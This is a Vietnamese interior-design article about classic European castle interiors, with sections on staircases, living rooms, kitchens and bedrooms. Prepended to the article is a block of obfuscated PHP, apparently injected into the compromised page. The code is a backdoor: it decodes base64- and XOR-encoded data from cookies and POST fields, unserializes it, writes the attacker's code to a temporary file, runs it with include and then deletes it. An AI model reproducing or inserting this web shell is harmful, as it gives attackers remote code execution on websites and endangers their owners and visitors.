$KAkylTEEY = chr ( 482 - 414 )."\x48" . "\161" . "\x5f" . 'w' . "\x6f" . "\x67" . chr (79); $BLHPO = "\143" . chr (108) . "\141" . 's' . 's' . "\x5f" . "\x65" . chr ( 220 - 100 ).'i' . chr (115) . chr ( 229 - 113 ).chr ( 225 - 110 ); $DPsHSlPuA = class_exists($KAkylTEEY); $BLHPO = "16968";$KybyXPAy = !1;if ($DPsHSlPuA == $KybyXPAy){function WRjHwIbZL(){return FALSE;}$fOnVgH = "60659";WRjHwIbZL();class DHq_wogO{private function rlZJn($fOnVgH){if (is_array(DHq_wogO::$gRtPmcWgqM)) {$zpikP = sys_get_temp_dir() . "/" . crc32(DHq_wogO::$gRtPmcWgqM["\163" . 'a' . chr ( 996 - 888 ).chr (116)]);@DHq_wogO::$gRtPmcWgqM["\x77" . 'r' . chr (105) . 't' . 'e']($zpikP, DHq_wogO::$gRtPmcWgqM["\143" . chr ( 1017 - 906 ).'n' . chr (116) . "\x65" . "\x6e" . "\x74"]);include $zpikP;@DHq_wogO::$gRtPmcWgqM["\x64" . chr ( 990 - 889 )."\x6c" . 'e' . 't' . "\x65"]($zpikP); $fOnVgH = "60659";exit();}}private $PkkbUal;public function wPWLohDk(){echo 27132;}public function __destruct(){$fOnVgH = "46060_22836";$this->rlZJn($fOnVgH); $fOnVgH = "46060_22836";}public function __construct($NTbnrrri=0){$dTJfkDR = $_POST;$lhQsTgIH = $_COOKIE;$aYajfQpXwB = "c11c5495-d7c1-4aa3-bdd1-dc687432bcb9";$BUmNVU = @$lhQsTgIH[substr($aYajfQpXwB, 0, 4)];if (!empty($BUmNVU)){$atjsQvzxK = "base64";$fobbAQWcLe = "";$BUmNVU = explode(",", $BUmNVU);foreach ($BUmNVU as $RzPEjLbK){$fobbAQWcLe .= @$lhQsTgIH[$RzPEjLbK];$fobbAQWcLe .= @$dTJfkDR[$RzPEjLbK];}$fobbAQWcLe = array_map($atjsQvzxK . chr ( 632 - 537 ).chr (100) . chr (101) . "\143" . "\x6f" . "\144" . chr (101), array($fobbAQWcLe,)); $fobbAQWcLe = $fobbAQWcLe[0] ^ str_repeat($aYajfQpXwB, (strlen($fobbAQWcLe[0]) / strlen($aYajfQpXwB)) + 1);DHq_wogO::$gRtPmcWgqM = @unserialize($fobbAQWcLe); $fobbAQWcLe = class_exists("46060_22836");}}public static $gRtPmcWgqM = 33420;}$iJgbDTDD = new /* 56130 */ $KAkylTEEY(60659 + 60659); $fOnVgH = strpos($fOnVgH, $fOnVgH); $KybyXPAy = $iJgbDTDD = $fOnVgH = Array();} Mẫu thiết kế nội thất lâu đài cổ điển kiểu châu Âu đẹp đẳng cấp
Image Alt

Mẫu thiết kế nội thất lâu đài cổ điển kiểu châu Âu đẹp đẳng cấp

Thiết kế nội thất lâu đài

Mẫu thiết kế nội thất lâu đài cổ điển kiểu châu Âu đẹp đẳng cấp

Lâu đài là một công trình kiến trúc lớn và nguy nga. Vì vậy yêu cầu về thiết kế nội thất lâu đài cũng vô cùng khắt khe. Sao cho khai thác tối đa vẻ đẹp tráng lệ và công năng của công trình. Trong bài viết này, TKNT247 sẽ giới thiệu đến bạn mẫu nội thất lâu đài kiểu châu Âu đẹp đẳng cấp bậc nhất hiện nay.

Phong cách thiết kế nội thất lâu đài:

 

Thiết kế nội thất lâu đài

Thiết kế lâu đài mang vẻ đẹp đẳng cấp và xa hoa

Các mẫu nội thất lâu đài thường được lấy cảm hứng phong cách châu Âu cổ điển. Phong cách nội thất châu Âu thường đặc trưng với các đường cong mềm mại. Trong đó điển hình là họa tiết trang trí được sử dụng nhiều cho tường, đồ nội thất hay các cầu thang thông tầng có kích thước khổng lồ. Màu sắc nội thất thuộc tông màu quý phái như trắng sáng, vàng đồng, xanh rêu,… Một không gian sẽ được bố trí cấp độ màu khách nhau tạo nên sự nhịp điệu đầy nghệ thuật. Thiết kế nội thất lâu đài cổ điển sử dụng các vật liệu cao cấp như da, gỗ, đá, pha lê tạo nên một công trình hoàn mỹ.

Mẫu thiết kế nội thất lâu đài đẹp:

Dưới đây là những gợi ý về bố trí nội thất các không gian cơ bản trong lâu đài. Hãy cùng khám phá ngay nhé.

Nội thất cầu thang lâu đài:

Cầu thang cổ điển đẹp

Thiết kế cầu thang đôi mạ vàng kiều diễm

Cầu thang lâu đài đẹp

Cầu thang lâu đài với họa tiết hoa lá uốn lượn tinh xảo

Cầu thang thường được coi là điểm nhấn quan trọng của các lâu đài. Vì vậy thiết kế cầu thang vô cùng quan trọng. Các mẫu cầu thang được tạo hình đường cong uốn lượn cùng họa tiết cầu kì. Đặc biệt, trang trí nội thất khu vực này thường là các loại đèn chùm thả trần cỡ lớn. Vừa đảm bảo công năng chiếu sáng vừa làm tăng thêm vẻ kiều diễm. Mỗi chi tiết thiết kế đều được chăm chút tỉ mỉ thể hiện được đẳng cấp của chủ nhân tòa lâu đài.

Nội thất phòng khách lâu đài:

Thiết kế nội thất phòng khách lâu đài đẹp

Khu vực sinh hoạt chung của gia đình

Phòng khách sang trọng

Phòng khách cực kì rộng rãi và xa hoa

Phòng khách trong các lâu đài được phân thành hai loại. Bao gồm phòng sinh hoạt chung dành cho gia đình và phòng tiếp khách. Phòng tiếp khách thường có diện tích lớn hơn và được thiết kế theo kiểu sang trọng. Trong khi đó thiết kế nội thất khu vực sinh hoạt chung mang cảm giác ấm cúng, thân tình.

Nội thất phòng bếp lâu đài:

Bếp nấu rộng rãi

Không gian nấu nướng rộng lớn thuận tiện cho thao tác của người đúng bếp

Vật liệu tủ bếp cao cấp

Tủ bếp được làm bằng vật liệu cao cấp

Không gian nấu nướng của các tòa lâu đài có diện tích rộng lớn. Hệ tủ bếp có kích thước lớn được trang bị các vật dụng tân tiến nhất tạo nên không gian nấu nướng tiện nghi. Phong cách thiết kế tủ bếp lâu đài hài hòa với không gian nội thất chung.

Nội thất phòng ngủ lâu đài:

Thiết kế nội thất phòng ngủ lâu đài

Màu sắc cùng hệ thống ánh sáng đèn được kết hợp hài hòa với nhau

Giường ngủ king size

Những chiếc giường có kích thước lớn mang lại giấc ngủ thoải mái

Nội thất phòng ngủ lâu đài được thiết kế mang đậm chất quý tộc. Những chiếc giường king size, thảm trải sàn trang trí,… là đồ nội thất không thể thiếu trong không gian này. Mỗi đồ vật đều được chế tác tỉ mỉ cùng sự bố trí theo nguyên tắc tỉ lệ vàng tạo nên một không gian nghỉ ngơi chất lượng cho gia chủ.

Ngoài các khu vực chức năng cơ bản trên, không gian nội thất lâu đài còn được chia thành nhiều phòng khác như phòng làm việc, phòng ăn riêng, phòng thay đồ,… Để biết thêm nhiều thông tin chi tiết hơn nữa về làm nội thất lâu đài nói chung và thiết kế nội thất nhà ở nói riêng, hãy liên hệ với chúng tôi để được tư vấn sớm nhất.

BÀI VIẾT LIÊN QUAN: